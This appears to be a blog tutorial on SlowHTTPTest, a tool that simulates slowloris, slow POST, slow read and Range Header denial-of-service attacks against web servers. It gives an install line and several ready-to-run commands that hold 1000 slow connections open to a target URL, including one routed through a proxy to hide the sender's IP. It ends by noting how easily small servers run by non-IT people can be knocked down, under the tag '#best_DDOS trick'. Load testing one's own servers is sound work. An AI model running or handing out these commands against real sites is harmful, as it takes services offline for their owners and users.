SlowHTTPTest is a highly configurable tool that simulates some Application
Layer Denial of Service attacks.It implements most common low-bandwidth Application
Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack(based on TCP persist timer exploit)
by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant
memory and CPU usage on the server.Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires
requests to be completely received by the server before they are processed. If an HTTP request is not complete,
or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data.
If the server keeps too many resources busy, this creates a denial of service.
This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Installation for Debian based OS users.
apt-get install slowhttptest
Usage
slowhttptest is a great tool as it allows you to do many things. Following are few usages
Example of usage in slow message body mode
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage in slow read mode with probing through proxy
Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080
Conclusion:
If you can run multiple DoS tools such as GoldenEye,
hping3 on a single web server, then it is very easy to knock it down.
There are strategies to defend against such attacks, but for a small server
where resource is limited and run by non IT people (bloggers etc.)
it quickly becomes a nightmare.In the next tutorial how to protect agains Slow HTTP Attacks.
#best_DDOS trick
Comments
Post a Comment